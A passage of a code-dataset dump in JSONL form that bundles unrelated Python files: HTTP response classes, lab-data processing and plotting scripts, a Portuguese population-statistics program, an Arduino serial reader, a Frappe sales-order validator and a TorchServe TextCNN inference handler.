\"Forbidden\"\n super(ResponseForbidden, self).__init__(data, status=403)\n\n\nclass ResponseNotAllowed(Response):\n\n status_code = 405\n\n def __init__(self, data=None):\n if data is None:\n data = {\"success\": 0, \"error\": \"Not Allowed\", \"status\": 405}\n if isinstance(data, str):\n data = {\"success\": 0, \"error\": data, \"status\": 405}\n elif isinstance(data, dict):\n if \"success\" not in data.keys():\n data['success'] = 0\n if \"status\" not in data.keys():\n data['status'] = 405\n if \"error\" not in data.keys():\n data['error'] = \"Not Allowed\"\n super(ResponseNotAllowed, self).__init__(data, status=405)\n\n\nclass ResponseBadRequest(Response):\n\n status_code = 400\n\n def __init__(self, data=None):\n if data is None:\n data = {\"success\": 0, \"error\": \"Bad Request\", \"status\": 400}\n if isinstance(data, str):\n data = {\"success\": 0, \"error\": data, \"status\": 400}\n elif isinstance(data, dict):\n if \"success\" not in data.keys():\n data['success'] = 0\n if \"status\" not in data.keys():\n data['status'] = 400\n if \"error\" not in data.keys():\n data['error'] = \"Bad Request\"\n super(ResponseBadRequest, self).__init__(data, status=400)\n\n\nclass ResponseUnauthorized(Response):\n\n status_code = 401\n\n def __init__(self, data=None):\n if data is None:\n data = {\"success\": 0, \"error\": \"Unauthorized\", \"status\": 401}\n if isinstance(data, str):\n data = {\"success\": 0, \"error\": data, \"status\": 401}\n elif isinstance(data, dict):\n if \"success\" not in data.keys():\n data['success'] = 0\n if \"status\" not in data.keys():\n data['status'] = 401\n if \"error\" not in data.keys():\n data['error'] = \"Unauthorized\"\n super(ResponseUnauthorized, self).__init__(data, status=401)\n","sub_path":"utils/Response.py","file_name":"Response.py","file_ext":"py","file_size_in_byte":4585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"423114943","text":"\nimport numpy as np\nfrom os.path import join\nimport pandas as pd\n\nfrom BrainDataAnalysis.Spike_Sorting import positions_on_probe as spp\nfrom spikesorting_tsne_guis import clean_kilosort_templates as clean\nfrom spikesorting_tsne import preprocessing_kilosort_results as preproc_kilo\n\nfrom ExperimentSpecificCode._2018_2019_Neuroseeker_Paper._256ch_Probe.St2.All_Channels import constants as const\n\n\nfrom spikesorting_tsne import preprocessing_kilosort_results as preproc_kilo, io_with_cpp as tsne_io, tsne as tsne, \\\n visualization as viz\n# ----------------------------------------------------------------------------------------------------------------------\n# \n# ----------------------------------------------------------------------------------------------------------------------\n\n# ----------------------------------------------------------------------------------------------------------------------\n# STEP 1: RUN KILOSORT ON THE DATA\n# ----------------------------------------------------------------------------------------------------------------------\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# \n# ----------------------------------------------------------------------------------------------------------------------\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# \n# ----------------------------------------------------------------------------------------------------------------------\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# \n# ----------------------------------------------------------------------------------------------------------------------\n\n# ----------------------------------------------------------------------------------------------------------------------\n# \n# ----------------------------------------------------------------------------------------------------------------------\n\n","sub_path":"ExperimentSpecificCode/_2018_2019_Neuroseeker_Paper/_256ch_Probe/St2/All_Channels/spikesorting.py","file_name":"spikesorting.py","file_ext":"py","file_size_in_byte":7709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"563634067","text":"import libreria\ndef agregar_mes():\n input(\"Agregar mes: \")\n print(\"Se ingreso mes\")\n\ndef agregar_dia():\n input(\"Agregar dia: \")\n print(\"Se ingreso dia\")\n\nopc=0\nmax=3\nwhile(opc!=max):\n print(\"######### MENU ##########\")\n print(\"# 1. agregar mes #\")\n print(\"# 2. agregar dia #\")\n print(\"# 3. salir #\")\n print(\"#########################\")\n\n opc=libreria.pedir_numero(\"ingrese opcion:\",1,3)\n\n if(opc==1):\n agregar_mes()\n if(opc==2):\n agregar_dia()\n\nprint(\"Programa finalizado\")\n# fin_menu\n","sub_path":"palacios/app9.py","file_name":"app9.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"249119588","text":"# -*- coding: utf-8 -*-\nimport pandas as pd\n#Need the pandas library\n\nBoard = \"6003\"\nSigOrTrig = \"SIG\"\t\n\ndef main():\n\n\t#get the first file of interest\n\n\tChannels = [0,1,2,3] #what channels?\n\t#AttenuationSettings = [\"010\",\"020\",\"030\",\"060\",\"090\",\"120\"] #what attenuation settings?\n\t#Temperatures = [\"N10\", \"P00\", \"P10\", \"P20\", \"P30\"] #what temperatures?\n\tAttenuationSettingsSig = [\"000\",\"008\",\"016\",\"024\",\"032\",\"040\",\"048\",\"056\",\"064\",\"072\",\"080\",\"088\",\"096\",\"104\",\"112\",\"120\"] #what attenuation settings?\n\tatt_trig=\"000\"\n\tTemperatures = [\"P30\"] #what temperatures?\n\t\n\tfor chan in Channels:\n\t\tfor att_sig in AttenuationSettingsSig:\n\t\t\tfor temp in Temperatures:\n\t\t\t\t#print \"SOURCE/ARAFE%s_%s%d_SIG%s_TRG%s_T%s_S11MAG.CSV\"%(Board, SigOrTrig, chan,att_sig,att_trig, temp)\n\t\t\t\tS11MagFile = \"SOURCE/ARAFE%s_%s%d_SIG%s_TRG%s_T%s_S11MAG.CSV\"%(Board, SigOrTrig, chan,att_sig,att_trig, temp)\n\t\t\t\tS11PhaseFile = \"SOURCE/ARAFE%s_%s%d_SIG%s_TRG%s_T%s_S11PHS.CSV\"%(Board, SigOrTrig, chan,att_sig,att_trig, temp)\n\t\t\t\tS11Mag = pd.read_csv(S11MagFile,skiprows=3) #skip the first two rows\n\t\t\t\tS11Mag.drop(S11Mag.columns[2], axis=1,inplace=True) #drop the third column\n\t\t\t\tS11Phs = pd.read_csv(S11PhaseFile,skiprows=3)\n\t\t\t\tS11Phs.drop(S11Phs.columns[2], axis=1,inplace=True)\n\t\t\t\tS11Mag.columns=['Frequency','|S11|']\n\t\t\t\tS11Phs.columns=['Frequency',' maior:\n\t\t\tmaior = dado.populacao\n\treturn maior\n\ndef getTotalSize(lista_municipios):\n\treturn len(lista_municipios)\n\ndef getAmplitude(lista_municipios):\n\t## a amplitude é a distancia entre o menor dado e o maior dado de uma amostra\n\treturn (getValorMaximo(lista_municipios) - getValorMinimo(lista_municipios))\n\ndef getMedia(lista_municipios):\n\t## Média é dada pela soma total dos valores, dividida pela sua quantidade\n\t## esta função retorna a média aritmética da população da amostra\n\tnumero_total_dados = len(lista_municipios) \n\tsoma_total = 0\n\n\tfor municipio in lista_municipios:\n\t\tsoma_total += municipio.populacao\n\t\n\t## a media é dada pela soma total dos valores, dividida pela sua quantidade\n\tmedia = soma_total / numero_total_dados\n\treturn media\n\ndef getMediaAgrupados(lista, lista_municipios):\n\t## esta parte é responsável por efetuar o cálculo da média dos dados agrupados,\n\t## que consiste na soma dos pontos medios de cada classe, multiplicado pela frequencia\n\t## absoluta da classe, dividida pelo total de dados\n\n\tsoma_pontos_medios = 0.0\n\tfor dicio in lista:\n\t\tsoma_pontos_medios += dicio['ponto_medio']*dicio['fi']\n\tmedia = soma_pontos_medios / getTotalSize(lista_municipios)\n\n\treturn media\n\ndef getMediana(lista_municipios):\n\t## Mediana é o valor que separa a metade maior e a metade menor de uma amostra, uma população ou uma distribuição de probabilidade.\n\t## Se houver um número par de observações, não há um único valor do meio. Então, a mediana é definida como a média dos dois valores do meio.\n\t## se o módulo da divisão do total de amostras por 2 for diferente de zero, retornamos o valor inermediário...\n\t## esta função retorna o valor mediano da população da amostra\n\n\tif len(lista_municipios)%2 != 0: \n\t\tvalor_meio = lista_municipios[(len(lista_municipios)//2)+1].populacao\n\t\treturn valor_meio\n\n\t## se o módulo da divisão do total de amostras por 2 for zero...\n\telse: \n\t\tvalor_meio_1 = lista_municipios[len(lista_municipios)//2].populacao\n\t\tvalor_meio_2 = lista_municipios[(len(lista_municipios)//2)+1].populacao\n\t\tmediana = (valor_meio_1+valor_meio_2) // 2\n\t\treturn mediana\n\ndef getMedianaAgrupados(lista, lista_municipios):\n\t## esta parte do código calcula a mediana dos dados agrupados\n\t## primeiramente verificamos se o dado \"do meio\" está dentro da classe\n\n\tqtd_media_dados = getTotalSize(lista_municipios) / 2\n\n\tfor dicio in lista:\n\n\t\tif dicio['limite_inferior'] <= qtd_media_dados and qtd_media_dados < dicio['limite_superior']:\n\t\t## a formula para calculo da mediana em dados ordenados é:\n\t\t#\n\t\t# Md = Li + (P - fai) x (h/fm)\n\t\t#\n\t\t##onde Li é o limite inferior da classe onde está a mediana, P é a posição da mediana no\n\t\t##conjunto total dos dados (chamado de posto da mediana), fai é a freqüência acumulada até a\n\t\t##classe anterior à classe onde está a mediana, h é a largura do intervalo de classe e fm é a\n\t\t##freqüência da classe onde está a mediana. \n\t\t## para fazer jus a formula e por motivos didaticos, atribuiremos às variaveis\n\t\t\tLi = dicio['limite_inferior']\n\t\t\tfai = dicio ['Fi'] - dicio['fi']\n\t\t\tfm = dicio['fi']\n\t\t\th = dicio['limite_superior'] - dicio['limite_inferior']\n\t\t\tP = dicio['limite_superior'] - qtd_media_dados\n\n\t\t\tmediana = Li + (P - fai) * (h/fm)\n\n\t\t\treturn mediana\n\ndef getModa(lista_municipios):\n\t## Moda é o valor que mais aparece num conjunto de dados.\n\t## esta função retorna um vetor de dicionarios com os valores modais {populacao:repeticao}\n\n\trelacao_valores_x_quantidade = {}\n\t\n\t## primeiro, realizamos a relacao entre o numero de habitantes e a quantidade de municipios que os possuem\n\tfor municipio in lista_municipios:\n\t\tif str(municipio.populacao) not in relacao_valores_x_quantidade:\n\t\t\trelacao_valores_x_quantidade.update({str(municipio.populacao): 1})\n\t\telse:\n\t\t\trelacao_valores_x_quantidade.update({str(municipio.populacao): relacao_valores_x_quantidade[str(municipio.populacao)] + 1})\t\n\n\t## logo após, selecionamos o numero de habitantes que mais repete na relacao \n\tmaior_repeticao = 0\n\tfor key in relacao_valores_x_quantidade:\n\t\tif relacao_valores_x_quantidade[key] > maior_repeticao:\n\t\t\tmaior_repeticao = relacao_valores_x_quantidade[key]\t\n\n\t## adicionamos as maiores repetições ao vetor de modas\n\tmodas = {}\n\tfor valor in relacao_valores_x_quantidade:\n\t\tif relacao_valores_x_quantidade[valor] == maior_repeticao:\n\t\t\tmodas.update({valor : relacao_valores_x_quantidade[valor]})\n\treturn modas\t\n\ndef getModaAgrupados(lista,lista_municipios):\n\t## a moda dos dados agrupados consiste no valor médio da classe de maior frequência absoluta\n\n\tmaior_frequencia = 0.0\n\tmoda = 0.0\n\n\tfor dicio in lista:\n\t\t## primeiro encontra_se a classe que possui a maior frequencia absoluta\n\t\tif dicio['fi'] > maior_frequencia:\n\t\t\tmaior_frequencia = dicio['fi']\n\t\t## logo após atribui-se o valor mediano da classe à moda\t\t\t\n\t\t\tmoda = dicio['ponto_medio']\n\treturn moda\n\ndef getVariancia(lista_municipios):\n\t## A variância é a soma dos quadrados dividida pelo número de observações do conjunto menos uma.\n\t## primeiro, calculamos a diferença de cada valor em relação à média e elevamos o resultado ao quadrado\n\t## esta funcao retorna um dicionario com as variancias(tipo_variancia:valor)\n\tvariancias = {}\n\tsoma_dos_quadrados = 0\n\tmedia = getMedia(lista_municipios)\n\n\tfor municipio in lista_municipios:\n\n\t\t## primeiro subtraimos o valor da media\n\t\tvalor = media - int(municipio.populacao)\n\n\t\t## logo apos elevamos ao quadrado\n\t\tvalor = valor**2\n\n\t\t## entao adicionamos à soma dos quadrados:\n\t\tsoma_dos_quadrados += valor\n\t\n\t## obtida a soma dos quadrados, dividimos pelo numero de amostras menos 1(variância amostral)\n\tvariancia_amostral = soma_dos_quadrados / (len(lista_municipios) - 1)\n\tvariancias.update({\"variancia_amostral\":variancia_amostral})\n\n\t## obtida a soma dos quadrados, dividimos pelo numero de amostras (variância populacional)\n\tvariancia_populacional = soma_dos_quadrados / (len(lista_municipios))\n\tvariancias.update({\"variancia_populacional\":variancia_populacional})\n\n\treturn variancias\n\ndef getVarianciaAgrupados(lista, lista_municipios):\n\t## a variancia de dados agrupados se dá pelo somatório dos quadrados da subtração do ponto médio da classe \n\t## pela média dos valores agrupados divida pela frequencia absoluta acumulada\n\t##\n\n\tmedia_agrupados = getMedianaAgrupados(lista, lista_municipios)\n\tvariancia = 0.0\n\tabsoluta = 0.0\n\n\tfor dicio in lista:\n\t\tponto_medio = dicio['ponto_medio']\n\t\tfrequencia_absoluta = dicio['fi']\t\n\t\tvariancia += ((ponto_medio - media_agrupados)**2)* frequencia_absoluta\n\t\tabsoluta+= frequencia_absoluta\n\tvariancia /= absoluta\n\treturn variancia\n\ndef getDesvioPadrão(lista_municipios):\n\t## O desvio padrão é capaz de identificar o “erro” em um conjunto de dados, caso quiséssemos substituir um dos valores coletados pela média aritmética.\n\t## O desvio padrão aparece junto à média aritmética, informando o quão “confiável” é esse valor. Ele é apresentado da seguinte forma:\n\t## média aritmética (x) ± desvio padrão (dp)\n\t## O cálculo do desvio padrão é feito a partir da raiz quadrada positiva da variância.\n\t## esta funcao retorna um dicionário de desvios_padrões (tipo_desvio:valor)\n\tdesvios = {}\n\tvariancias = getVariancia(lista_municipios)\n\n\t##aqui calculamos a raiz da variancia amostral (desvio padrão)\n\tdesvio_padrao_amostral = math.sqrt(variancias[\"variancia_amostral\"])\n\tdesvios.update({\"desvio_padrao_amostral\" : desvio_padrao_amostral})\n\n\t## aqui calculamos a raiz da variancia populacional (desvio amostral)\n\tdesvio_padrao_populacional = math.sqrt(variancias[\"variancia_populacional\"])\n\tdesvios.update({\"desvio_padrao_populacional\" : desvio_padrao_populacional})\n\n\treturn desvios\n\ndef getCoeficienteDeVariacao(lista_municipios):\n\t## O coeficiente de variação (CV) é definido como a razão do desvio padrão pela média \n\t## esta funcao retorna um dicionario com os coenficientes e seus valores (tipo_coeficiente:valor)\n\tcoenficientes = {}\n\n\tmedia = getMedia(lista_municipios)\n\tdesvios = getDesvioPadrão(lista_municipios)\n\n\t## coeficiente de variação amostral\n\tcoenficiente_amostral = desvios[\"desvio_padrao_amostral\"]/media\n\tcoenficientes.update({\"coenficiente_variacao_amostral\":coenficiente_amostral})\n\n\t## coeficiente de variação populacional\n\tcoenficiente_populacional = desvios[\"desvio_padrao_populacional\"]/media\n\tcoenficientes.update({\"coenficiente_variacao_populacional\":coenficiente_populacional})\n\n\treturn coenficientes\n\n## métodos para gerar a tabela de distribuição de frequencias\ndef getTabelaFrequencia(lista_municipios):\n\t## linha base da tabela para ser formatada com os dados\n\tvalores = []\n\tvalores1 = []\n\tvalores2 = []\n\tfrequencia_acumulada = 0.0\n\tfrequencia_acumulada_relativa = 0.0\n\n\t## QUANTIDADE DE CLASSES PARA A DISTRIBUIÇÃO DE FREQUENCIAS\n\t\n\t## tamanho do intervalo das classes\n\tTAMANHO_CLASSES = getAmplitude(lista_municipios) / NUMERO_CLASSES\n\n\t## tamanho da classe inicial, determinado pelo menor valor\n\tvalor_minimo_classe = getValorMinimo(lista_municipios)\n\n\t## aqui é gerada uma linha da tabela para cada classe com os seus respectivos dados\n\t\n\tfor i in range (0, NUMERO_CLASSES):\n\t\t\n\t\t## atualizamos o valor maximo de acordo com o minimo\n\t\tvalor_maximo_classe = valor_minimo_classe + TAMANHO_CLASSES\n\t\tponto_medio_classe = (valor_minimo_classe+valor_maximo_classe)/2\n\t\t\n\t\tfrequencia_absoluta = getQuantityIntervalBetween(lista_municipios, valor_minimo_classe, valor_maximo_classe) # (fi)\n\t\tfrequencia_relativa = frequencia_absoluta / getTotalSize(lista_municipios) # (fri)\n\t\tfrequencia_acumulada += frequencia_absoluta # (Fi)\n\t\tfrequencia_acumulada_relativa += frequencia_relativa # (Fri)\n\n\t\tvalores1.append({\n\t\t\t'intervalo': \"%d - %d\" % (valor_minimo_classe, valor_maximo_classe),\n\t\t\t'ponto_medio': ponto_medio_classe,\n\t\t\t'fi': frequencia_absoluta,\n\t\t\t'fri': frequencia_relativa,\n\t\t\t'Fi': frequencia_acumulada,\n\t\t\t'Fri': frequencia_acumulada_relativa})\n\n\t\tvalores2.append({\n\t\t\t'limite_inferior': valor_minimo_classe,\n\t\t\t'limite_superior': valor_maximo_classe,\n\t\t\t'ponto_medio': ponto_medio_classe,\n\t\t\t'fi': frequencia_absoluta,\n\t\t\t'fri': frequencia_relativa,\n\t\t\t'Fi': frequencia_acumulada,\n\t\t\t'Fri': frequencia_acumulada_relativa})\n\n\t\tvalores.append(valores1)\n\t\tvalores.append(valores2)\n\t\t##atualizamos então o novo valor minimo para a proxima classe\n\t\tvalor_minimo_classe += TAMANHO_CLASSES\n\treturn valores\n\ndef generateTXTTabelaFrequencia(lista):\n\t\"\"\"'limite_superior':0, 'limite_inferior':0,\"\"\" \n\tmaior_string = {'intervalo':0, 'ponto_medio':0, 'fi':0, 'fri':0, 'Fi':0, 'Fri':0}\n\tlista = lista[0]\n\n\tfor dicio in lista:\n\t\tfor key in dicio:\n\t\t\tif len(str(dicio[key])) > maior_string[key]:\n\t\t\t\tmaior_string.update({key:len(str(dicio[key]))})\n\n\ttabela = \"\"\n\tfor key in maior_string:\n\t\ttabela += \" %s%s\"%(key, \" \"*((maior_string[key])-len(key)+2))\n\ttabela+= \"\\n\"\n\n\tlinha = \"\"\n\tfor dicio in lista:\n\t\tfor key in dicio:\n\t\t\tlinha+=\" %s %s |\"%((dicio[key]), \" \"*(maior_string[key]-len(str(dicio[key]))))\n\t\tlinha+=\"\\n\"\n\t\ttabela+= linha\n\t\tlinha = \"\"\n\n\treturn tabela\n\ndef calculateValuesFromTabela(lista, lista_municipios):\n\tlista = lista[1]\n\n\t##somatório dos pontos médios\n\n\tmedia = getMediaAgrupados(lista, lista_municipios)\n\tmediana = getMedianaAgrupados(lista, lista_municipios)\n\tmoda = getModaAgrupados(lista, lista_municipios)\n\tvariancia = 0.0\n\n\tdesvio_padrao = 0.0\n\tcoeficiente_de_variacao = 0.0\n\n\treturn {'media': media,\n\t'mediana': mediana,\n\t'moda': moda,\n\t'variancia': variancia,\n\t'desvio_padrao': desvio_padrao,\n\t'coeficiente_de_variacao': coeficiente_de_variacao\n\t}\n\n## metodos para gerar o histograma (utilizando matplotlib)\ndef generateHistograma(lista_municipios):\n\t## para delimitar o intervalo das classes, foi utilizado o bom senso, pois trata-se de dados geográficos\n\t# os intervalos das classes foram montados de acordo com a quantidade de municípios e uma pré análise dos dados obtidos\n\n\ty_axis = getValorClassesHistograma(lista_municipios, limite_superior_classes)\n\tx_axis = range(len(y_axis))\n\twidth_n = 0.5\n\tbar_color = 'blue'\n\n\tbar = plt.bar(x_axis, y_axis, width=width_n, color=bar_color, align=\"center\", linewidth=10)\n\tplt.xticks(x_axis, generateLabelsName(limite_superior_classes, lista_municipios))\n\n\tplt.show()\n\n#\tplt.savefig(\"histograma_%s_classes.png\"%str(len(limite_superior_classes)), dpi=500)\n\ndef generateLabelsName(limite_superior_classes, lista_municipios):\n\tnomes = []\n\tfor i in range(0,len(limite_superior_classes)):\n\t\tif i == 0:\n\t\t\tnomes.append(\"%d a %d\\nhabitantes\"%(getValorMinimo(lista_municipios), limite_superior_classes[i]))\n\t\telse:\n\t\t\tif limite_superior_classes[i] > 999:\n\t\t\t\tnomes.append(\"%d a \\n%d\\nhab.\"%(limite_superior_classes[i-1],limite_superior_classes[i]))\n\t\t\telse:\n\t\t\t\tnomes.append(\"%d a %d\\nhab.\"%(limite_superior_classes[i-1],limite_superior_classes[i]))\n\treturn tuple(nomes)\n\ndef getValorClassesHistograma(lista_municipios, limite_superior_classes):\n\tvalores = []\n\tfor i in range(0,len(limite_superior_classes)):\n\t\tif i == 0:\n\t\t\tvalores.append(getQuantityIntervalBetween(lista_municipios, 0, limite_superior_classes[i]-1))\n\t\telse:\n\t\t\tvalores.append(getQuantityIntervalBetween(lista_municipios, limite_superior_classes[i-1], limite_superior_classes[i]-1))\n\treturn valores\n\n###################### single file aplication ###############################\n\ndef getQuantityIntervalBetween(lista_municipios,menor=0, maior=0):\n\t## esta função retorna a quantidade de municípios que possuem o número de habitantes no intervalo inclusivo (menor, maior)\n\treturn len([municipio for municipio in lista_municipios if municipio.populacao >= menor and municipio.populacao <= maior])\n\ndef readFileMunicipios(src):\n\treturn [Municipio(line) for line in open(src, 'r').readlines() if line[0]!=\"#\"]\n\nclass Municipio:\n\tposicao, cod_ibge, nome, uf, populacao = 0,0,\"\",\"\",0\n\tdef __init__(self, string):\n\t\tvalues = string.split(\",\")\n\t\tmunicipio = Municipio\n\t\tself.posicao = int(values[0])\n\t\tself.cod_ibge = int(values[1])\n\t\tself.nome = values[2]\n\t\tself.uf = values[3]\n\t\tself.populacao = int(values[4])\n\tdef str(self):\n\t\treturn self.nome+\"\"+self.uf\n\n\tdef toString(self):\n\t\treturn \"%s - %s - %s - %s - %s\"%(self.posicao, self.cod_ibge, self.nome, self.uf, self.populacao)\nif __name__ == '__main__':\n\tmain()","sub_path":"avaliacao_estatistica/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":17181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"245520401","text":"import serial, time\narduino = serial.Serial('/dev/ttyACM0', 9600)\ntime.sleep(2)\narduino.write('1')\nasc = []\n\nfor x in range(33,126):\n\tasc.append(arduino.readline())\n\nfor x in asc:\n\tprint(x)\n\narduino.close()","sub_path":"serialArduino.py","file_name":"serialArduino.py","file_ext":"py","file_size_in_byte":206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"26451047","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2021, Noah Jacob and contributors\n# For license information, please see license.txt\n\nfrom __future__ import unicode_literals\nimport frappe\nfrom frappe.model.document import Document\nfrom frappe.utils import flt\n\n\nclass SalesOrder(Document):\n\tdef validate(self):\n\t\tcalc_totals(self)\n\t\tvalidate_quantity(self)\n\t\t\n\n\ndef calc_totals(self):\n\tself.total_amount, self.total_quantity, self.total_cost_price = 0, 0, 0\n\tif not self.items:\n\t\tfrappe.throw(\"Add some Items before saving\")\n\tfor d in self.items:\n\t\td.amount = d.item_quantity * d.item_rate\n\tfor d in self.items:\n\t\tcost_price = flt(d.item_quantity) * flt(d.standard_rate)\n\t\tself.total_cost_price = self.total_cost_price + cost_price\n\t\tself.total_quantity = flt(self.total_quantity) + flt(d.item_quantity)\n\t\tself.total_amount = flt(self.total_amount) + flt(d.amount)\n\n\ndef validate_quantity(self):\n\tfor d in self.items:\n\t\tif d.item_quantity < 0 or d.item_quantity == 0:\n\t\t\tfrappe.throw(\"Item quantity is invalid\")\n","sub_path":"accounting/accounting/doctype/sales_order/sales_order.py","file_name":"sales_order.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"580525213","text":"import matplotlib.pyplot as plt\nimport csv\nimport numpy\n\nwith open('Raw_plastics2.csv', 'rU') as f:\n rows = []\n for row in csv.reader(f):\n rows.append(row)\n \nx = []\nlabels = rows[0][1:]\ndel rows[0]\nfor a in range(len(rows)):\n for b in range(len(rows[a])):\n if b == 0:\n x.append(round(float(rows[a][b]), 0))\n else:\n rows[a][b] = round(float(rows[a][b]), 2)\n\ncols = []\nfor a in range(1, len(rows[0])):\n col = []\n for b in range(len(rows)):\n col.append(rows[b][a])\n cols.append(col)\n\nfor b in range(len(cols)):\n zero = cols[b][0]\n for c in range(len(cols[b])):\n cols[b][c] = (cols[b][c]-zero)*(-1)\n\nnew_x = [[], [], []] \nfor a in range(len(cols[0])):\n this_x = []\n count = 0\n for b in range(len(cols)):\n this_x.append(cols[b][a])\n if (b+1)%9==0:\n new_x[count].append(numpy.mean(this_x))\n this_x = []\n count += 1\n \n\nax1 = plt.subplot(111)\n#y = [20, 30, 40]\n#ylab = [20, 30, 40, 50, 60, 70, 80, 90, 100]\ncols = new_x\nlabels = ['Amorphous PET', 'PET powder', 'Weathered PET powder']\n\nfor c in range(len(cols)):\n ax1.plot(x, cols[c], label=labels[c])\n plt.sca(ax1)\n plt.xticks([500, 1000, 1500, 2000, 2500, 3000, 3500, 4000], rotation=90)\n plt.xlim([4000, 500])\n plt.ylabel('Absorbance (%)')\n plt.xlabel('Wavenumber (cm$^{-1}$)')\n #plt.yticks(y, ylab)\n\nax1.legend()\nplt.tight_layout()\nplt.savefig('Raw plastics2.png', dpi=300)","sub_path":"5_RW_thesis/Degradation_FTIR/plot_raw2.py","file_name":"plot_raw2.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"511945480","text":"#!/usr/bin/env python\n# encoding: utf-8\n# @author: 有莘不殁 (Lei Wang)\n# @license: MIT\n# @contact: lwangshark2013@gmail.com\n# @software: pycharm\n# @file: TextCNN_handle.py\n# @time: 2021/3/25 下午6:08\n# @desc: ModelHandler defines a custom model handler for TextCNN\n\nimport logging\nimport torch\nimport torch.nn.functional as F\nfrom torchtext.data.utils import ngrams_iterator\nimport pickle as pkl\nimport os\nfrom ts.torch_handler.base_handler import BaseHandler\n\nid2class = {0:\"finance\",1:\"realty\",2:\"stocks\",3:\"edu\",4:\"sci\",5:\"society\",6:\"politics\",7:\"sports\",8:\"game\",9:\"entertainment\"}\n\nUNK, PAD = '', '' # 未知字,padding符号\nvocab_dir = \"vocab.pkl\"\nvocab = pkl.load(open(vocab_dir, 'rb'))\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nbatch_size = 128 # mini-batch大小\npad_size = 32 # 最好和训练集一致,根据文本特点选择该超参数\n\n\nlogger = logging.getLogger(__name__)\n\nclass TextCNN_handle(BaseHandler):\n \"\"\"\n A custom model handler implementation.\n \"\"\"\n\n class InferDataIterater(object):\n def __init__(self, batches, batch_size, device):\n self.batch_size = batch_size\n self.batches = batches\n self.n_batches = len(batches) // batch_size\n self.residue = False # 记录batch数量是否为整数\n if self.n_batches == 0:\n self.residue = True\n elif len(batches) % self.n_batches != 0:\n self.residue = True\n self.index = 0\n self.device = device\n\n def _to_tensor(self, datas):\n x = torch.LongTensor([_[0] for _ in datas]).to(self.device)\n y = torch.LongTensor([_[1] for _ in datas]).to(self.device)\n # pad前的长度(超过pad_size的设为pad_size)\n # seq_len = torch.LongTensor([_[2] for _ in datas]).to(self.device)\n return x, y\n\n def __next__(self):\n if self.residue and self.index == self.n_batches:\n batches = self.batches[self.index * self.batch_size: len(self.batches)]\n self.index += 1\n batches = self._to_tensor(batches)\n return batches\n\n elif self.index >= self.n_batches:\n self.index = 0\n raise StopIteration\n else:\n batches = self.batches[self.index * self.batch_size: (self.index + 1) * self.batch_size]\n self.index += 1\n batches = self._to_tensor(batches)\n return batches\n\n def __iter__(self):\n return self\n\n def __len__(self):\n if self.residue:\n return self.n_batches + 1\n else:\n return self.n_batches\n\n def build_infer_iterator(self, dataset, batch_size, device):\n iter = self.InferDataIterater(dataset, batch_size, device)\n return iter\n\n def __init__(self):\n self._context = None\n self.initialized = False\n self.explain = False\n self.target = 0\n self.device = device\n\n def initialize(self, context):\n \"\"\"\n Initialize model. This will be called during model loading time\n :param context: Initial context contains model server system properties.\n :return:\n \"\"\"\n self._context = context\n super().initialize(context)\n self.initialized = True\n # load the model, refer 'custom handler class' above for details\n # self.manifest = context.manifest\n #\n # properties = context.system_properties\n # model_dir = properties.get(\"model_dir\")\n # self.device = torch.device(\"cuda:\" + str(properties.get(\"gpu_id\")) if torch.cuda.is_available() else \"cpu\")\n #\n # # Read model serialize/pt file\n # serialized_file = self.manifest['model']['serializedFile']\n # model_pt_path = os.path.join(model_dir, serialized_file)\n # if not os.path.isfile(model_pt_path):\n # raise RuntimeError(\"Missing the model.pt file\")\n #\n # model = torch.load(model_pt_path)\n # model.eval() # 固化如dropout 这样的层\n # self.model = model.to(device)\n\n def preprocess(self, data):\n \"\"\"\n Transform raw input into model input data.\n :param batch: list of raw requests, should match batch size\n :return: list of preprocessed model input data\n \"\"\"\n # Take the input data and make it inference ready\n # print(data)\n # logger.info(\"data is \")\n # logger.info(data.keys())\n inputs= data[0]['body']['input']\n for key in data:\n logger.info(key)\n #data = inputs.get(\"data\") or inputs.get(\"body\")\n preprocessed_data = inputs\n\n\n\n tokenizer = lambda x: [y for y in x]\n contents = []\n for lin in preprocessed_data:\n lin = lin.strip()\n if not lin:\n raise Exception('The input sentence is None !!!')\n words_line = []\n token = tokenizer(lin)\n seq_len = len(token)\n if pad_size:\n if len(token) < pad_size:\n token.extend([PAD] * (pad_size - len(token)))\n else:\n token = token[:pad_size]\n seq_len = pad_size\n # word to id\n for word in token:\n words_line.append(vocab.get(word, vocab.get(UNK))) # dict.get(key, default) 第二个参数为key不存在的缺省值\n contents.append((words_line, int(0), seq_len))\n infer_iter = self.build_infer_iterator(contents, batch_size, device)\n return infer_iter # [([...], 0), ([...], 1), ...]\n\n def inference(self, model_input):\n \"\"\"\n Internal inference methods\n :param model_input: transformed model input data\n :return: list of inference output in NDArray\n \"\"\"\n # Do some inference call to engine here and return output\n model_output = []\n for texts, _ in model_input:\n out_puts = self.model.forward(texts)\n logger.info(\"the output is :\")\n logger.info(out_puts)\n predics = torch.max(out_puts.data, 1)[1].cpu().numpy().tolist()\n for i in predics:\n model_output.append(id2class[i])\n res = \";\".join(model_output)\n\n return [res]\n\n def postprocess(self, inference_output):\n \"\"\"\n Return inference result.\n :param inference_output: list of inference output\n :return: list of predict results\n \"\"\"\n # Take output from network and post-process to desired format\n postprocess_output = inference_output\n\n return postprocess_output\n\n def handle(self, data, context):\n \"\"\"\n Invoke by TorchServe for prediction request.\n Do pre-processing of data, prediction using model and postprocessing of prediciton output\n :param data: Input data for prediction\n :param context: Initial context contains model server system properties.\n :return: prediction output\n 